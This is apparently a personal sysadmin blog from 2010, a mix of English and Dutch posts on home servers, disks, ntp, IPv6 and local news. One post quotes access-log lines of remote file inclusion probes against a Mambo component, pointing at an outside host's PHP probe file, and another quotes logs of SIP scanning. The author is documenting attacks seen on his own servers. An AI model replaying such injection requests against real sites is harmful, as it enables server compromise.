200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:41 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"

The content of heheh.txt is predictable:

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

By pure coincidence there is a file http://zerozon.co.kr/data/eeng/id1.txt with the contents:

<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

And that all looks very familiar: Fx29Shell php attack. This won't keep me from writing about security or amusing myself by browsing the logfiles. Maybe I'll find a fresh attack. This automated one is getting really boring.

Na de uitslag van de gemeenteraadsverkiezingen 2010 trok iemand de conclusie dat het zo niets meer gaat worden met Almere. Gratis mee te nemen dus bij de rommelmarktspullen.
Lokale screengrab, marktplaats had niet genoeg gevoel voor humor om de advertentie te laten staan.

Yes, took the step. The homepage lives at https://idefix.net/ and the old url redirects. And will have to keep doing that for at least 10 years. Or maybe more, the url for my homepage that was valid until August 2000 still has a working redirect. I'm not moving anything else because that would confuse me too much. So the base href in the html source has to stay.

A ~ in your homepage URL is somewhat very nineties so I started making http://idefix.net/ also point at my homepage and I moved the original content of that page to idefix.net history. I'm now wondering whether I should redirect http://idefix.net/~koos/ to the new location (migrating all links in for example search engines) or let both point at the same page.. or what.
I found some discussions on the tilde in the url. Jukka Korpela has an article Why tilde (~) should not be used in Web addresses (URLs) which explains why this unixism is a bad idea in the modern web and the explanation Get Clues from URLs notes:

Most servers use the ~ symbol to represent the personal directories of individuals.
If the URL contains a tilde then be aware that you are probably (although not definitely) looking at a personal page with personal opinions rather than an official site giving the official line.

Well, as I am the owner of idefix.net there should not be any difference between my opinion and the official opinion of the site.
At work we also got rid of the tildes ages ago so maybe I should just follow the sign of the times. Being good webmasters the old urls still work: http://www.cs.uu.nl/~koos/ will redirect to http://people.cs.uu.nl/koos/.
Enough rambling, this change was to me reason for a bump in the minor version number of the homepage.

In Duitsland is de Vorratsdatenspeicherung (bewaarplicht telecommunicatie gegevens) terdege teruggeroepen door het constitutioneel hof omdat de wetgeving in strijd is met de Duitse grondwet. In Duitsland is er wel een constitutioneel hof wat wetten kan toetsen en wat dat mag aan de hand van klachten van Duitse burgers.

Nu nog zoiets in Nederland... artikel 120 van de Nederlandse grondwet verbiedt een constitutioneel hof. Er ligt een wetsvoorstel van Femke Halsema van Groenlinks om de grondwet te wijzigen om dit deels mogelijk te maken. Maar dat moet nog een keer door de tweede en eerste kamer.

Links:

• BVerfG, 1 BvR 256/08 vom 2.3.2010, Absatz-Nr. (1 - 345) de officiële uitspraak (in juridisch Duits..)
• Pressemitteilung Nr. 11/2010 vom 2. März 2010 Persbericht van het Bundesverfassungsgericht
• Karlsruhe kippt Vorratsdatenspeicherung - Heise.de Heise.de (Duits)
• "Hoogste Duitse rechter: 'bewaarplicht is ongrondwettig'" - Bits of Freedom

Nedap stemcomputers zijn niet dood, ze ruiken alleen maar heel raar. Bij de gemeenteraadsverkiezingen morgen weer een oprisping: Toch elektronisch stemmen bij verkiezingen - nu.nl waarbij dus stemcomputers een 'schaduwverkiezing' draaien, men kan na het echte kiezen met het rode potlood ook nog stemmen via een stemcomputer die werkt met het bonnetjessysteem (stem wordt gelijk uitgedraaid op een bonnetje en in een stembus gedeponeerd). Het aantal 'echte' stemmen met potlood en het aantal stemmen op de stemcomputers hoeven dus niet overeen te komen, maar zou Nedap het aandurven dat een accountant de uitslagen van de computers en die van de computerbonnetjes natelt?

First peak at 5000 packets/second ntp traffic seen on ntp.cs.uu.nl. Still going strong under this load.

antiek aan de rol

Een NS DE3 treinstel passeert heel langzaam de overweg in de Huizingalaan in het spoor vanaf Utrecht Maliebaan naar de kruising bij Blauwkapel. Bij navraag blijkt het de DE3 nummer 114 van het spoorwegmuseum te zijn.

I just noticed something: the archive of webcam.idefix.net in the Uithof in Utrecht now covers a longer period (now 3 years and approximately 3 months) than the archive of webcam.idefix.net at the Beneluxlaan in Utrecht (which stopped just a bit over 2 years). How time flies.

Lots of phishing attempts for webmail accounts flying by, at the moment it seems popular to use webform hosters to ask for account credentials. I seem to miss a part of these. Probably my spamfilters being too good or something. But at work there are some people who know I am interested in new and recurring strains of Internet abuse so I still get interesting stuff forwarded to investigate. The latest catch advertised a dot.tk domain which inlined a webform from a tripod hosted site which was a copy of an emailmeform.com form and used emailmeform.com to process it and redirected to a generic thankyou form by a new zealand printer supplies company. It takes a bit of tracing and trying to solve such a puzzle and notify all parties about their role in the abuse.

By now a lot of people in the world are aware of the case of a US, Pennsylvania school was accused of using webcams in school-issued laptops to spy on students at home without their consent (via Slashdot). A lot of theories and weird stories are going around but I found a good technical explanation: The Spy at Harrington High - Stryde Hax who as a bystander and with his technical background has done a thorough analysis of the techniques used and the stance of the people involved in this matter. Good reading material for those who are actually interested in what was really happening.
The original story seems to be turning into this 'Only in America' story: School spying scandal gets even more bizarre - Slashdot:

The student in question that was disciplined for an "improper act" was apparently accused of either drug use or drug selling. Turns out he was eating Mike & Ike candy, not popping pills.

If you want to detect LANRev Agent on a system, Network Fingerprint for LANRev Agent - Stryde Hax has the answer.

SIP scanning is active again. Sandro Gauci came with a link to And the scanning just keeps on coming I checked the logs on 2 asterisk servers for recent break-in attempts and presto... from different IPs, but the pattern I saw before in trying to find insecure SIP servers:

[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"3776548202"<sip:3776548202@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"100"<sip:100@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"101"<sip:101@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"102"<sip:102@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found


[Feb 21 10:09:28] NOTICE[6890] chan_sip.c: Registration from '"952"<sip:952@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:28] NOTICE[6890] chan_sip.c: Registration from '"953"<sip:953@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:28] NOTICE[6890] chan_sip.c: Registration from '"954"<sip:954@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found

No damage and no costs. The other server shows attempts to use the sip guest environment again:

[Feb 13 05:27:08] NOTICE[5710] chan_sip.c: Call from '' to extension '90442075821233' rejected because extension not found.
[Feb 13 05:27:27] NOTICE[5710] chan_sip.c: Call from '' to extension '9442078493108' rejected because extension not found.
[Feb 13 05:27:38] NOTICE[5710] chan_sip.c: Call from '' to extension '0442076311117' rejected because extension not found.
[Feb 13 05:27:40] NOTICE[5710] chan_sip.c: Call from '' to extension '0011447850019298' rejected because extension not found.
[Feb 13 05:27:42] NOTICE[5710] chan_sip.c: Call from '' to extension '00011441628481177' rejected because extension not found.
[Feb 13 05:27:44] NOTICE[5710] chan_sip.c: Call from '' to extension '0001441383417547' rejected because extension not found.
[Feb 13 05:27:56] NOTICE[5710] chan_sip.c: Call from '' to extension '0000447956581268' rejected because extension not found.
[Feb 13 05:27:57] NOTICE[5710] chan_sip.c: Call from '' to extension '00011441628481177' rejected because extension not found.
[Feb 13 05:28:08] NOTICE[5710] chan_sip.c: Call from '' to extension '900442075964032' rejected because extension not found.
[Feb 13 05:28:08] NOTICE[5710] chan_sip.c: Call from '' to extension '9011441252625280' rejected because extension not found.
[Feb 13 05:28:09] NOTICE[5710] chan_sip.c: Call from '' to extension '1442074370973' rejected because extension not found.
[Feb 13 05:28:10] NOTICE[5710] chan_sip.c: Call from '' to extension '9442078493108' rejected because extension not found.
[Feb 13 05:28:10] NOTICE[5710] chan_sip.c: Call from '' to extension '00000447889904142' rejected because extension not found.
[Feb 13 05:28:10] NOTICE[5710] chan_sip.c: Call from '' to extension '0001441383417547' rejected because extension not found.

This time with somewhat random looking phone numbers in the UK which aren't well-known to google.

De backup tapes van BBS Koos z'n Doos waren nog leesbaar, dus ik ben nu wat aan het spelen met wat van die tapes af kwam, en dat komt on-line op http://bbs.idefix.net/.

Todays xkcd is very amusing! As a system administrator I can imagine the need for making sure important infrastructure like the blog of a cat.

Friday, time for the Friday Afternoon URL page which you can also follow on twitter as @fridayaftURL to get fresh Friday Afternoon URLs in your twitter feed!

No license to rdesktop for me: I recently got a really weird error from rdesktop:

koos@leek:~$ rdesktop -M -g 1200x900 -d something terminalserver
Autoselected keyboard map en-us
disconnect: No valid license available.

Some searching found me: License to rdesktop. Indeed, setting a different hostname from my own hostname helps:

koos@leek:~$ rdesktop -M -g 1200x900 -d something -n leeks terminalserver
Autoselected keyboard map en-us
/users/koos/.rdesktop/licence.leeks.new: Permission denied
WARNING: Remote desktop does not support colour depth 24; falling back to 16

The license file error has to do with another workaround. But maybe the running out of licenses for 'leek' is because I never give licenses back. Why is all this software very busy with making sure money is made for its maker and not busy with helping the user.

The EFF has written an article Music Journalism is the New Piracy. The music industry seems to have the intention of thoroughly destroying itself, and that destruction will be celebrated by music fans worldwide. Found via Is There Any Way To Be A Music Blogger Without Risking Takedown? at Techdirt.
Or as Boingboing put it: Music industry to musicbloggers: there's no point in obeying the law.

Some actors are annoyed by being typecast in the same roles constantly, but some cities can be typecasted too: I watched WarGames (1983) yesterday and noted in a number of shots of Seattle it was raining. Now I'm watching Firewall (2006) and I think I haven't seen an outdoor scene yet without rain.
I visited Seattle myself and it's not that bad.

Na een lezing van Arnoud Engelfriet op de recente surfnet cert (computer emergency response teams) / ibo (informatie beveiligers in het onderwijs) conferentie ben ik eens door Internetrecht aan het bladeren en hij merkt iets op waar ik me ook vreselijk aan erger: Houd eens op met dat “Bron: Youtube” of “Bron: Flickr.com”!. Het heeft dus ten eerste het aspect dat beide sites het platform zijn en dat de originele auteur prima te vinden is (mijn ergernis) maar ook dat de licentie het niet altijd zomaar toestaat (afhankelijk van de eventuele nieuwswaarde van filmpje / foto).
En prompt zie ik een voorbeeld hoe het wel moet: hln.be geeft bij de eerste foto's van het treinongeluk in België keurig aan: twitpic.com user xxxx. Alleen heb ik het toen niet bewaard en zijn de foto's nu blijkbaar wel vervangen door persfoto's.

Even with my head clouded by a serious cold I had to create my lolcaption when I saw this picture and caption at ROFLRazzi Goes Romantic…ish. My take on it: Dingdong! .. Nobody home!

Sometimes even I use that other 'operating system' which in this particular case had no acrobat pdf reader. So I went to find it.. and it is a 45 meg (!!!) download which installs its own download-manager in Firefox. This download manager advertises for more downloads from Adobe and related companies. All this while Firefox has a perfect download manager of its own and it is all the equivalent of wget $url. To put it mildly: whisky tango foxtrot.

The first friday with the friday afternoon url page using Twitter @fridayaftURL to deal out the weekly dose of Friday afternoon fun.
Technically it all worked. But with myself and only a german url shortening service following it there isn't much of an audience yet! Time to do something about that.

I did some serious web services programming (in perl) and updated the scripts powering the Friday Afternoon URL page to post new urls via Twitter on Friday. You can follow @fridayaftURL to get a weekly dose of Friday afternoon stuff from all over the web. The urls are now stored in a (postgresql) database and on Friday a script runs which searches for new urls and posts them to Twitter using the Twitter api. When urls need to be shortened it uses the ln -s_ web service to shorten them.

I found the probable cause of the not so great power saving: when I installed the first new disk I also updated the bios. And the message I get when trying to load the powernow-k8 cpu driver is:

powernow-k8: Found 1 AMD Athlon(tm) Dual Core Processor 4850e processors (2 cpu cores) (version 2.20.00)
powernow-k8: MP systems not supported by PSB BIOS structure
powernow-k8: MP systems not supported by PSB BIOS structure

So the cpu keeps running at maximum speed without throttling. Searching for the error message finds Ubuntu Bug #33116: powernow-k8 refuses to load and Ubuntu Bug #398109: powernow-k8: Your BIOS does not provide ACPI _PSS objects in a way that Linux understands suggests that I need to check the bios settings to enable "Cool'n'Quiet", enable ACPI APIC and disable MCP61 ACPI HPET Table. That's planned for the next hardware changes.

Ok, I'm usually not the flash and embedding type, but after a bit of trying this one is nice:

My first association when I heard that jingle...

I noticed that the new Western Digital WD15EADS disk spun down way too fast. After some serious testing I found: when I set the "Advanced Power Management" level (using hdparm -B) to 127 or less the "standby (spindown) timeout" (set using hdparm -S) is ignored and the drive spins down after about 5 8 seconds of inactivity. Way too soon when playing a movie, with mplayer the movie stalls about every 10 seconds because a new bit of movie has to be read from disk which causes another start/stop. The smartctl start/stop counter goes up at the same rate. Feels like a firmware bug to me or a difference of opinion between hdparm and the disk. But the hdparm report suggests that these settings should work on the disk:

ATA device, with non-removable media
        Model Number:       WDC WD15EADS-00S2B0                     
        Firmware Revision:  04.05G04

        Standby timer values: spec'd by Standard, with device specific minimum
        Advanced power management level: 126

           *    Power Management feature set

I asked Western Digital customer help about this but the first (standard?) answer is from Support for WD products in LINUX or UNIX which comes down to "we don't support anything else than jumper settings for these operating systems".

A lot of further searching with google suggests to me that the 'IntelliPark' feature is causing the drive to park its heads after 8 seconds of inactivity which is not a useful default when streaming video from it with a reasonable cache. And the 'Load Cycle Count' will go up fast, which may result in the drive reaching the 'suggested maximum' within a year. I don't need to test the warranty that fast.

As a workaround I set the Advanced Power Management level back to 128 and installed spindown which is a utility which watches the disk activity from userspace and issues a spindown command when no activity (from /proc/diskstats, so for linux at the device level) was measured over the configured period of time. Now it spins down when the filesystems have been idle for 10 minutes which is a lot more usable.
Update: Official answer from Western Digital customer help is that it's not possible to change this 8 second timeout. So I'll stick to the spindown solution.

Update 2: Robert Waldner also noted this problem and described how to change the idle timeout / "IntelliPark" time on Western Digital Caviar Green disks.

The resulting power save from adding a new sata disk, moving the data and removing the old pata disks is not spectacular (yet): the 5 pata disks (all with activated automatic spindown) had the UPS at a 40% load, the current 2 sata and 2 pata disks (also with automatic spindown) have the UPS at a 42% load. It'll be interesting to see what happens when the 2 pata disks can be removed. The main original idea was to save a bit of power and make the system less complicated, let's see if that first part works out in the end.
Update: Found the cause of the not so great power saving: probably the recent bios update.

Filesystems have been moved to the new huge sata disk in home server greenblatt and I found time this evening to remove three old ones. There may be a race condition in the startup scripts where lvm2 is not completely up and running when the filesystems are mounted from the fstab but I saw that happen only once.

My very own security incident involving China (in a way):

[Jan 28 09:55:45] NOTICE[7593] chan_sip.c: Call from '' to extension '00442078420960' rejected because extension not found.

An attempt (within the public sip context) to call a number in England. The Chinese embassy in London. All attempts failed since the asterisk which logged that has no idea how to call the big phone network. Information from a lecture on SIP security suggests that this kind of attempts is a sort of ddos attack on a phone number.

I looked at the project sundial power calculations again and did some more calculations: even when I take the parts with the lowest energy usage and get the average usage down to 5.4 Watt, the investment in solar panels to get even through December and January in the Netherlands would mean it would take somewhat over a 100 years to 'earn back' the investment in the solar panels. So maybe it is a better idea to power the weatherstation from the grid and make sure the earth connection is really good to avoid damage to the power grid at home should lightning strike it. Still using wifi for data transfer would be a wise idea.
Update: About the same goes for wind power: because we live in the city and can't put up a 10 meter high pole for a wind generator the generator would become quite expensive.

Maybe IPv6 traffic will get another boost now: for participants in the Google over IPv6 program the records for youtube now have been added:

$ host www.youtube.com
www.youtube.com is an alias for youtube-ui.l.google.com.
youtube-ui.l.google.com has address 74.125.77.100
youtube-ui.l.google.com has address 74.125.77.101
youtube-ui.l.google.com has address 74.125.77.102
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::8b
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::8a
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::65
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::71
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::64
youtube-ui.l.google.com has IPv6 address 2a00:1450:8001::66

Video is streamed from cache servers like:

$ host v1.lscache1.c.youtube.com
v1.lscache1.c.youtube.com is an alias for v1.lscache1.l.google.com.
v1.lscache1.l.google.com has address 82.94.228.144
v1.lscache1.l.google.com has IPv6 address 2a00:1450:4001::10

All reachable via IPv6. I'm almost tempted to try to try to play a youtube video via a v6-only connection and see what breaks.

In following some links about 1-wire projects I found a German Supplier of 1-wire components which can be interesting: Fuchs Elektronik sells 1-wire components at a reasonable price such as the DS18B20 1-wire high resolution thermometer. Too bad they don't sell other interesting sensors like the barometer which could help in combining an order.

Wardriving results 14 December 2009 - 1 February 2010: 4450 new networks with GPS locations according to WiGLE. In the WiGLE stats I went to 13th place and passed the 180000 networks mark.

WiGLE also did a very nice upgrade: the new WiGLE wardriving maps are based on google maps.

We volunteered ntp.cs.uu.nl for extra capacity for the Turkish ntp pool, and the results are quite visible in the ntp.cs.uu.nl statistics. Suddenly peaks are near 5000 packets per second. But ntpd (and the freebsd kernel) deal with it without problems.

And I'm back from a snowboarding holiday in Fiss in Austria. A great wintersport area, connecting Fiss, Ladis and Serfaus. We had great weather, first sun and later snow, resulting in fresh powder for the last few days. Snowboarding in fresh powder is really great. I got some much needed rest too.

Tien jaar geleden haalde ik mijn rijbewijs (en gebruikte ik dus ook al newsitems op mijn homepage). Dus het was tijd voor vernieuwen. Ik kreeg daar keurig een brief over van de RDW maar die was met alle verbouwingsdrukte blijven liggen. Vorige week ontdekte ik dat 2010-01-10 geweest was en ik dus geen geldig 'roze papiertje' meer had. Snel voor pasfoto's naar foto boekhorst die prima pasfoto's volgens de huidige regels en toen naar de gemeente Utrecht voor de aanvraag. Ondertussen rond, dus nu is het 'roze papiertje' vervangen door een 'roze creditcard'.

I upgraded ntpd on ntp.cs.uu.nl from 4.2.4 to 4.2.6 and suddenly I notice in the output that this has changed the stratum from 2 to 1.

$ ntpq -c rv ntp.cs.uu.nl
status=011d leap_none, sync_atomic, 1 event, event_13,
version="ntpd 4.2.6@1.2089-o Fri Jan 15 14:31:14 UTC 2010 (1)",
processor="i386", system="FreeBSD/5.4-RELEASE-p13", leap=00, stratum=1,
precision=-19, rootdelay=0.000, rootdisp=1.456, refid=PPS,
reftime=cefb066f.cbe638ff  Fri, Jan 15 2010 16:21:19.796,
clock=cefb0693.889dd5ee  Fri, Jan 15 2010 16:21:55.533, peer=7047, tc=6,
mintc=3, offset=-0.001, frequency=15.448, sys_jitter=0.002,
clk_jitter=0.001, clk_wander=0.002

Which matches the peer list where the PPS stratum is now 0:

$ ntpq -c peer ntp.cs.uu.nl
     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
*huygens.cs.uu.n .PPS.            1 u   23   64  377    0.197    0.009   0.258
+stardate.cs.uu. .PPS.            1 u   13   64  377    0.998   -0.058   0.033
+tijger.phys.uu. metronoom.dmz.c  2 u   15   64  376    0.599    0.004   0.185
 LOCAL(0)        .LOCL.          10 l  627   64    0    0.000    0.000   0.002
oPPS(0)          .PPS.            0 l   49   64  377    0.000   -0.002   0.002
 NTP.MCAST.NET   .MCST.          16 u    -   64    0    0.000    0.000   0.002

I guess some definition of PPS input has changed. Now I wonder how much more ntp traffic this will cause.

Het winterweer houdt nog steeds strak vol, en dus kijk ik naar mijn vervoersmogelijkheden. Met de gladheid gebruik ik zowiezo maar de rechtopfiets en niet de ligfiets, rechtop voel ik me dan toch iets veiliger. Ik vroeg me eerst af waar alle meldingen over gladheid op fietspaden in Utrecht vandaan kwamen totdat ik van de week naar iets anders wilde fietsen dan naar mijn werk in de Uithof. In de gemeente Utrecht worden alleen de fietspaden goed schoongehouden. Op zich een prima actie. Maar, er zijn daarnaast nog veel meer fietsroutes waarlangs zich dagelijks grote aantallen fietsers voortbewegen. Als die fietsroute toevallig een achteraf straat is waar geen doorgaand autoverkeer hoort te zijn dan zit deze ook buiten de routes waar schoongemaakt zal worden. Een erg duidelijk voorbeeld is te zien rond het Salvador Allendeplein in Utrecht: de fietspaden daar, onder andere langs de Kardinaal de Jongweg zijn prima geveegd. Maar de Troelstralaan, wat voor veel fietsers de route is naar de binnenstad is een ijsbaan.
Ik had graag een kaartje uit openstreetmap toegevoegd maar daar ontbreken nogal wat fietspaden in dit gebied. Projectje voor wanneer het beter weer is.

The new disk in the homeserver greenblatt was another case of a disk not wanting to go to sleep after the set period. Some searching found two answers: spindown, a daemon to monitor disks for inactivity and spin them down with sg_start --stop or hdparm -y. But the other answer was a better answer: hdparm standby timeout not working for WD raptors? has as answer:

* I also know of quite a number of drives where hdparm -B settings override the -S settings, even if you set the -S settings after the hdparm -B settings. You could try combinations with various values of hdparm -B, especially 1 and 255.

And the manpage of hdparm has this bit:

-B Set Advanced Power Management feature, if the drive supports it. A low value means aggressive power management and a high value means better performance. Possible settings range from values 1 through 127 (which permit spin-down), and values 128 through 254 (which do not permit spin-down). The highest degree of power management is attained with a setting of 1, and the highest I/O performance with a setting of 254. A value of 255 tells hdparm to disable Advanced Power Management altogether on the drive (not all drives support disabling it, but most do).

Default on the WD drives is indeed 128, which does not permit spindown on idle. I changed it to 127, see if that helps. I prefer it if the drives decide for themselves when to spin down.
Update : Yes, the changed advanced power management setting helps, now the drive spins down when not in use.

Vanmorgen via het centrum met de bus, met de ov-chipkaart. Behalve het privacy aspect is het namenlijk verder een handig systeem, al zouden sommige dingen handiger kunnen voor de reiziger als een en ander vanuit het perspectief van de reiziger was ontworpen.
Maar op een bepaald moment vielen de ovchip kaartlezers in de bus uit. De chauffeur was naast het rijden bezig met een touchscreen waar een status op rood stond. Blijkbaar is er toch communicatie met de buitenwereld nodig voor werkende ovchip kaartlezers. Uit de originele verhalen begreep ik dat bussen genoeg hadden aan een gps ontvanger. Opvallend is ook dat de automatische halte-aankondigingen van de bus het toen niet meer deed. Toen kon ik dus ook niet meer uitchecken bij het uitstappen, of de kaartlezer van een andere gvu bus gebruiken om uit te checken, want ik zag overal rode ledjes. Bij een volgende busrit in een bus waar de ovchip automaat niet werkte zwaaide ik dus maar even met de ovchip kaart naar de chauffeur die me zo doorzwaaide.
Maar nu heb ik dus een uitcheck actie gemist. Kijken of de restitutie actie daar ook voor werkt.
Update 2010-01-13: Restitutie geprobeerd: volgens de ov chipkaart restitutieformulieren (afgrijselijke deeplink binnen een framesite) moet ik een bonnetje uitprinten met de laatste 10 transacties:

Let op: stuur uitdraai mee van laatste tien transacties. U kunt een overzicht van uw laatste tien transacties uitdraaien bij de oplaad- en verkoopautomaten op metrostations en bij Verkoop- en Informatiepunten.

Alleen: waar doe je dat. Op de ov-chipkaart adresvinder kan ik geen vinkje aanzetten 'transactie overzicht uitdraaien'. Die in de Uithof bij de bibliotheek kan het niet, de automaat bij de GVU klantenservice in het centrum kan het ook niet, dan maar in de rij voor het loket van de GVU klantenservice. Waar ze een stapje verder gingen: ze konden gelijk de mislukte transactie repareren, waardoor ik het hele formulier niet meer nodig had.

The sensors at home are updated with data from the new disk. The cause of the relatively high temperatures is that 3 disks (2 pata and 1 new sata) are in one cage together. I hope to rearrange disks so the airflow improves and they cool better. I might need a bit longer sata cable to make that happen.

Work on home server greenblatt: time for less disks with more storage. So I bought two sata disks, one huge one to store the camera archive and scratch files, and one for the system and home directories. The choice for two disks is so the one with the camera archive and the scratch files can fall asleep when not in use, to save a bit of power. Installing both new disks at once wasn't going to happen due to space and cabling considerations so I started with the big one. When that one is done I can remove three pata disks from the system. I also updated the system bios to the latest version which made the system clock a lot more stable, ntpd now runs without having to use tickadj. Bios updates are easy these days: this bios can update itself from a USB stick. I chose logical volume management (lvm2) again for managing the big disks so it will be easy to expand storage when needed without getting a big tree of filesystem mounts.

Anybody know any leads in receiving data from a weather station which uses "instant transmission" on 868 MHz? I'd like to receive data from such a weather station. In linux, on the server. Some device which would receive the data and present it via a serial port would be great.
Update: the wonderful thing about standards.. I learned that there is no standard for data from weather stations on 868 MHz and that a sensor from brand A will not be received by a receiver from brand B. Time to be more specific: the weather station is a TFA-Dostmann "Stratos". I already e-mailed a technical contact at TFA-Dostmann about this.
Update 2010-01-14: Answer from TFA-Dostmann: it is impossible to receive the data from that weather station on a computer.

Yesterday during the meeting of the hcc pcgg netwerkgroep I saw something which I could not research at the time and it bugs me: one person had Windows 7 running and the network connections screen said "IPv4 Connectivity: Internet" and "IPv6 Connectivity: Local". But that is the wrong answer: Due to my work on the openvpn ipv6 tunnel there should be full IPv6 Internet access. So now this is bugging me and I'm trying to find out how exactly Windows 7 determines whether IPv6 is 'local' or 'Internet'. The system was on the wireless network and the connection just started to work so maybe IPv6 router announcements with a global IPv6 address were missing. Or maybe more is needed like a v6 nameserver.

The Netherlands, Vlieland with less snow
Image credit: NASA/GSFC, MODIS Rapid Response

More satellite image browsing: the Modis rapid response system image gallery offers a lot. Nice detail in the latest images showing the Netherlands such as the Aqua/Modis pass at 2010-01-08 12:45 UTC: Vlieland has a lot less snow!.

Image credit: NERC Satellite Receiving Station, Dundee University, Scotland

Interesting snow cover in the Netherlands, with more coming up. This satellite image from this morning shows a serious white cover and some clouds. The big rivers are visible as darker lines and the ice growth on parts of the IJsselmeer shows.

I tried to use the --filter option in rsync but I was a bit baffled by the syntax and the manpage is nice but I couldn't understand. I wanted certain directories completely, other directories default excluded and certain files in one directory but not all. After some trail and error and talking to the teddybear:

rsync -rvv --progress /home/koos/rsyncsource/ /home/koos/rsyncdest --filter='merge /home/koos/rsyncfilter'

And in the filter file name things to include and exclude:

+ /wel/
- /niet/
+ /random/file
- /random/*

And the result is what I want:

$ ~/bin/testrsync 
building file list ... 
[sender] showing directory wel because of pattern /wel/
[sender] hiding directory niet because of pattern /niet/
[sender] hiding file random/niet because of pattern /random/*
[sender] showing file random/file because of pattern /random/file
7 files to consider
delta-transmission disabled for local transfer or --whole-file
random/
random/file
           0 100%    0.00kB/s    0:00:00 (xfer#1, to-check=4/7)
wel/
wel/file1
           0 100%    0.00kB/s    0:00:00 (xfer#2, to-check=2/7)
wel/file2
           0 100%    0.00kB/s    0:00:00 (xfer#3, to-check=1/7)
wel/file4
           0 100%    0.00kB/s    0:00:00 (xfer#4, to-check=0/7)
total: matches=0  hash_hits=0  false_alarms=0 data=0

sent 319 bytes  received 126 bytes  890.00 bytes/sec
total size is 0  speedup is 0.00

Now to do this on a filesystem with 151000 files.

Google knows where your AP lives, and it's not that hard to query it! Geolocation API Network Protocol can work based on a query with one AP mac address. Testing it with a random access-point near work gives me: http://samy.pl/mapxss/?mac=00%3A1A%3A1E%3A15%3A90%3AE2. Found via Hacker pilfers browser GPS location via router attack - The Register where the user is not asked for permission to trace the location when a wireless router is used. And indeed: 'Scary how accurate it is'.

The year 2010 seems to be an unfathomable far future, I just found another Y2.01K problem. The zonecheck tool gives a warning which reads '2010 is not a valid year':

w> The format of the serial number is not YYYYMMDDnn
 | Ref: RFC1912 (p.3)
 |   The recommended syntax is YYYYMMDDnn (YYYY=year, MM=month, DD=day,
 | nn=revision number).
 `----- -- -- - -  -
 :   The serial 2010010502 doesn't seem to be in the YYYYMMDDnn format.
 `..... .. .. . .  .

And the code indeed shows:

    # DESC: recommanded format for serial is YYYYMMDDnn
    def chk_soa_serial_fmt_YYYYMMDDnn(ns, ip)
        serial = soa(ip).serial
        return true if (serial > 1999000000) && (serial < 2010000000)
        { 'serial' => serial }
    end

The far future is happening today.
Filed as Ubuntu bug #503501.

Nieuws maken kan ook prima in Nederland. Vanmorgen in het ontbijtnieuws en ook in de Volkskrant: 'Drankmerken redden imago met voorlichting’ met:

Producenten van alcoholische dranken die hameren op het verantwoord gebruik van alcohol, doen dat alleen om hun eigen imago op te vijzelen.
Dat stelt STAP, het Nederlands instituut voor alcoholbeleid

Nee, STAP is gewoon de "Stichting Alcohol Preventie". En dan is het ineens een stuk duidelijker waar deze mening vandaan komt. Een moderne uitvoering van de blauwe knoop dus. Maar als je jezelf een beetje neutraal benoemd als 'instituut voor alcoholbeleid' en mooie rapporten schrijft dan lijk je ineens geloofwaardiger en nemen het ANP en wat kranten je zwaar bevooroordeelde rapport over. Uit de categorie "wij van wc-eend adviseren wc-eend".

The well monitored heating system worked a lot better during the night, so the problems are fixed. Only the heater pump ran a few times which I think is part of the frost-protection. The isolation in our house is good: the living room temperature only dropped from 19⁰C to 16.8⁰C over the whole night while it was below 0⁰C outside.

Hot water system fixed: the 3-way valve controlling how the heating/boiler system heats water was broken due to calcium buildup. Now replaced and suddenly things work as expected again.

A day with temperatures staying below 0 ⁰C and the first working day is not the right day to call the heating company about a hot water problem. They sounded very very busy on the phone

More scientific research into the problems with the heater show that the sensor detecting hot water being used seems to be malfunctioning: the system starts for hot water use about every 5 minutes even when not a drop of water is used in the house. Time to call for a repair. I hope the company which does repairs to heating installations isn't too busy with problems due to the current temperatures, those are well below freezing at the moment.

Fireworks launch

The change of the year is celebrated in the Netherlands with fireworks, it is the one day per year all people of at least 16 years are allowed to light fireworks.

And I wish everybody reading this a great new year!

During all the work in the house some of the 1-wire temperature sensors were disabled and removed to avoid damage. Today I did some work on the house and re-installed them. The sensor in the living room is now installed inside the room thermostat so it's hidden and should give the same reading as the thermostat. I also re-installed the temperature sensor in the crawlspace which will show up in the sensors at home overview.

